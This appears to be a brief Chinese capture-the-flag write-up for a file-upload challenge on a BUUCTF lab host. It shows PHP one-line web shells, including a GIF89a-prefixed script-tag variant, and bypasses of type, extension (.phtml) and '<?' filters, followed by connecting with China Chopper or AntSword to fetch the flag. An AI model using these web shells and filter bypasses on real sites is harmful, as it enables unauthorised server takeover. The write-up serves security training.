題目打開是一個文件上次功能點

首次常規操作二話不說先上傳一個一句話木馬。
<?php @eval($_POST['123'])?>
頁面提示被攔截,並顯示not image

那我們進行抓包修改Content-Type字段進行繞過

發現php后綴被攔截,所以我們用畸形的后綴在進行繞過。
phtml、pht、php、php3、php4、php5
發現phtml可以正常繞過

發現<?被檢測出來,進行攔截了,所以我們需要替換我們的一句話木馬。
GIF89a? <script language="php">eval($_REQUEST[123])</script> #替換之后的木馬
然后就上次成功了

訪問upload目錄
http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/

然后用菜刀、蟻劍鏈接,鏈接地址
http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/shell.phtml
在根目錄下找到flag
